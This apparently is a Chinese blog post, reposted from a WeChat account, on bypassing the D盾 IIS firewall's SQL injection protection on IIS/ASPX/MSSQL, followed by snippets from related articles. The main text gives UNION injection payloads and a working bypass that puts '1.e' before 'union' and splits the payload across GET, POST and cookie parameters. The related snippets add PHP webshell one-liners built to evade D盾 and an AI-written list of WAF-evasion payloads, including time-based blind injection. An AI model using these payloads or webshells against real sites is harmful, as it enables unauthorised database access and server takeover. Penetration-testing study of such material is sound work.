Bypass之D盾IIS防火墙SQL联合注入绕过(新版)

最新推荐文章于 2025-07-16 11:24:04 发布
最新推荐文章于 2025-07-16 11:24:04 发布
阅读量1.2w 收藏 15
点赞数
分类专栏: 渗透姿势收集 文章标签: D盾SQL注入联合查询绕过检测
这种技术文章,不好意思标原创了,一下内容均来自公众号
Bypass

实验环境
IIS+ASPX+MSSQL

一、MSSQL特性
在MSSQL中,参数和union之间的位置,常见的可填充的方式有如下几种:
1.空白字符
01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

2.注释符号

Mssql也可以使用注释符号/**/

3.浮点数

select * from admin where id=1.1union select 1,'2',db_name() from admin

4.1E0的形式:

select * from admin where id=1e0union select 1,'2',db_name() from admin

但是很遗憾,以上几种填充方式都无法绕过D盾的union select检测

二、bypass Fuzz
针对构造的SQL注入点,进行Fuzz参数和union之间的位置

http://192.168.8.161/sql.aspx?id=1【Fuzz位置】union select null,null,SYSTEM_USER

Fuzz结果:通过1.e这种特殊的数值形式,可成功绕过union select防御。

1803112887.png

到这里,可union select,形成了部分Bypass,接下来考虑,如何去绕过select from的防御规则。

三、个人觉得比较厉害的 ASPX HPP特性绕过
假设GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序是什么样呢?

ASPX+IIS:同时提交参数id,会接收所有参数,通过逗号分隔,如下图:

二、Bypass 测试

    利用ASPX+IIS同时接收参数的方式比较特别,可以用这个特性来搞事。 利用这个特性来拆分select from,从而绕过D盾的SQL注入防御规则。


总之就是用  1.e  来绕过D盾对union select的检测
用ASPX的特性,将要输入的payload语句放在   GET,POST,COOKIE的位置传输,来绕过D盾对select from语句的检测
sql注入绕过
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-16 1124
【代码】sql注入绕过
绕过D,D实战绕过
11-18
绕过D实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
bypass新版dmysql_21. Bypass D_防火墙(旧版 and 新版SQL注入防御(多姿势)...
weixin_31437187的博客
02-03 338
D旧版:00前言D_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL),看到这边的策略,主要的测试思路:a、白名单...
全面掌握DWeb查杀助手:网络安全工具的详细解析
最新发布
weixin_35045970的博客
07-16 694
DWeb查杀助手是针对Web应用安全防护的工具,它通过集成多种安全检查和防护机制,为网站提供一套全面的安全解决方案。在网络安全威胁日益增长的当下,D为站长和Web管理员提供了一个简易而有效的工具集,不仅能够进行深度扫描,还能实施有效的防护措施,保护网站免受恶意攻击和代码注入。D提供灵活的防护策略配置,允许用户根据自己的需要进行调整:白名单管理:允许用户设置信任的域名或IP,防止误报。策略配置:自定义扫描和防护规则,实现个性化防护。
Bypass D_IIS防火墙SQL注入防御(多姿势)
09-14 1629

 0X01 前言
   D_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL...
sqlmap绕过d_姿势分享——SQL注入bypass D
weixin_39594080的博客
12-09 5928
首先感谢兄弟们的支持与关注,我们的成长离不开您的陪伴在我们做项目的途中经常会遇到各种各样的waf,防火墙等来拦截我们的payload,这很是让渗透测试人员头疼,其实网上就有很多关于waf绕过原理的文章,这篇文章就是想告诉大家,当大家理解了网上关于waf绕过的文章的内容并对其原理了解后,其实把理论深化进实践中并没有多困难,本篇文章就是将一个简单常规的小思路实践了一下,便成功绕过了D的wa...
注入mysql win2003服务器密码_Win2003服务器防SQL注入神器--D_IIS防火墙
weixin_36464343的博客
01-19 222
0X01 前言D_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL),看到这边的策略,主要的测试思路:a、白名单 ...
第06篇:Bypass D_IIS防火墙SQL注入防御(多姿势)1
08-03
思路:a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql,可花费不少时间,测试过
第一篇:Bypass D_IIS防火墙SQL注入防御(多姿势)1
08-03
这边的策略,主要的测试思路:a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql
bypass新版dmysql_Bypass 护卫神SQL注入防御(多姿势)
weixin_29543939的博客
02-06 997
0x00 前言​ 护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL注入功能。这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。0x01 环境搭建软件版本:护卫神·入侵防护系统 V3.8.1 最新版本测试环境:IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL0x02 WAF测...
第三篇:Bypass ngx_lua_waf SQL注入防御(多姿势)1
08-03
### Bypass ngx_lua_waf SQL注入防御方法解析 #### 0x00 前言 ngx_lua_waf是一款基于ngx_lua的Web应用防火墙,以其高性能和轻量级著称。它内置了一系列针对常见攻击手段(如SQL注入)的防御规则。然而,任何安全...
46、47-绕过WAF(Web应用程序防火墙)--介绍、主要功能、部署模式、分类及注入绕过方式等
XLbb的博客
06-03 2274
网站WAF是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。能够为用户提供实时的网站安全;IP黑白名单功能允许用户设置个性化的IP信任列表,直接屏蔽或者允许指定IP访问网站。同时,增加iP临时黑名单功能,以及实现了针对某个功能的iP白名单功能。同时,爬虫白名单提供爬虫信任机制,在出现误拦截情况下,允许用户自定义爬虫信任。
Bypass D_防火墙新版SQL注入防御.pdf
12-21
Bypass D_防火墙新版SQL注入防御.pdf
Sql server注入注入绕过
qq_42990434的博客
12-17 4910
本章目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D 绕过特性 前言 我们经常利用一些数据库特性来进行WAF绕过。 在MSSQL中,比如可以这样: 浮点数形式:id=1.1union select 科学计数法形式:id=1e0union select 但其实还可以这样子:id=1.eunion select 通过1.e这样的形式,可以用它绕过DSQL注入防护,通过简单的Fuzz,我们来一起探索一下M
sql注入遇D-
A19911511842的博客
01-24 996
最后变形为where id like if(ascii(left(current_user,1))like 98,1,0)把这个变成我们常见的就可以了 例如:select * from cms_xxxx where id=1;Waf过滤规则很简单 过滤了一些常见的函数 随便替换一个即可绕过 小waf 拿捏了。发现我们的输入能直接拼接在查询语句中 只是拼接的位置和平常的不太一样 换个思路。界面变了 id=1 id=0有明显变化 这轮子能用。这waf又来了 绕 通过测试拦截了=数字型 看/1 /0的区别。
绕过D一句话
Home to come
04-16 1157
通过网上各种渠道搜索,我一共上传了16个php文件,只有两个文件成功绕过了D 1. <?php eval('' . get() . ''); /** * @return string */ function get() { $get = $_GET['password']; return $get; } <?php $a=1;$b="a=".$_GE...
sqlmap绕过d_记一次很迷的绕过D的经历
weixin_39949473的博客
12-09 2696
今天上课的时候,无聊的我看着qq中的群聊,突然看到一个学弟说有个存在D的站绕不过去,我心想到我展现自己的时候了,互加好友之后,也拿到了站点。一个单引号打过去给我拦截了。被拦截了,也要想办法毕竟不能丢脸,尝试了很多办法都没有绕过。睡着还被老师发现,让我站起来回答问题,啊这,我灵机一动说我趴着听课呢?逃过一劫,但做人不能放弃啊,我下课直接去吃饭了,已经放弃的我打算写作业,然后又想起来那个站...
简单绕过d (免杀马)
wsitcj的博客
03-29 746
用代码执行的思路绕过,设置一个类,把他绕晕(手动滑稽) <?php Class hello{ public function pingjie(){ $a="ass"; $b="ert"; return $a.$b; } public function __construct($str){ $this->name = $str; } public function __destruct(){ $t=$this->pingjie(); $t($this
绕过D的一句话
03-05 5808
一个很简单的一个技巧,作个笔记,可以绕过D检测。 新建test1.php &lt;?php eval($_POST[g]); ?&gt; 新建test2.php &lt;?php $a="$_POST[g]"; eval($a=$a); ?&gt; 使用D_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。 那么问题就出现...
sql注入绕过D
03-28
<think>嗯,用户问的是SQL注入绕过D的方法。首先,我需要确认D是什么。D可能是一款防火墙或者入侵检测系统,专门用来防御Web攻击,比如SQL注入。接下来,我应该回忆常见的SQL注入绕过技术,并结合D的特点来分析可能的绕过方法。 首先,用户可能需要知道D检测机制。通常,这类工具会检测常见的SQL关键字,比如SELECT、UNION、WHERE等,或者特殊字符如单引号、注释符。所以绕过的方法可能包括混淆这些关键字,比如大小写变换、插入注释或空白符,或者使用URL编码。 然后,我需要考虑具体的绕过技巧。比如,使用字符串拼接,像用CONCAT('sel','ect')代替SELECT;或者利用十六进制编码,把字符串转换成十六进制形式,避免使用引号。还有,是否可以利用时间盲注或其他盲注方式,因为D可能对即时的错误回显有检测,但时间盲注通过延迟响应来获取信息,可能更隐蔽。 另外,用户可能想知道如何测试这些方法,比如通过修改HTTP请求的参数,使用工具如Burp Suite来构造和发送恶意请求,观察响应是否有变化或是否被拦截。同时,提醒用户注意法律和道德问题,未经授权的测试是非法的。 需要注意,不同的版本或配置的D可能有不同的检测规则,所以一种方法可能在某些情况下有效,而在其他情况下无效。因此,保持技术更新和持续测试是关键。 最后,要确保回答结构清晰,分点列出方法,并强调防御的重要性,比如参数化查询和输入验证,帮助用户不仅了解攻击方法,也加强防护意识。</think>SQL注入绕过D的常见方法及原理分析: 1. **混淆关键字符** - 使用URL编码:`SELECT` → `%53%45%4C%45%43%54` - 插入注释符:`SEL/**/ECT` 或 `SEL/*!*/ECT` - 大小写混合:`SeLeCt`(部分WAF对大小写不敏感) 2. **等价替换技术** - 空字符截断:`%00SELECT`(利用空字节截断过滤规则) - 特殊符号分割:`SEL[+E]CT` 或 `SEL%0bECT` - 注释符干扰:`UNION/*bypass*/SELECT` 3. **参数污染攻击** - 提交重复参数:`?id=1&id=2 union select 1,2,3--` - 利用不同参数解析顺序绕过检测 4. **时间盲注绕过** - 使用延时函数: ```sql ' OR IF(ASCII(SUBSTR(database(),1,1))>100,sleep(3),1)-- ``` - 结合位运算减少特征字符 5. **分块传输编码** - 通过`Transfer-Encoding: chunked`分割恶意载荷 - 示例: ``` 3 un 2 io 4 n s ``` 6. **二次编码绕过** - 双重URL编码:`%2527` → `'` - 混合编码类型:`%u0027`(Unicode编码) 7. **非常规语句构造** - 使用`LIKE`代替`=`: ```sql ' OR 1 LIKE 1-- ``` - 利用数学表达式:`(1)div(0)`代替显式报错 防御建议: 1. 使用预编译语句(参数化查询) 2. 严格限制数据库权限(最小权限原则) 3. 启用WAF的语义分析功能 4. 对输入进行多层级过滤验证 5. 定期更新防护规则库 注意:本文仅用于安全研究学习,未经授权测试他人系统属于违法行为。实际防护需结合多层防御体系,单一检测工具无法完全阻止高级攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值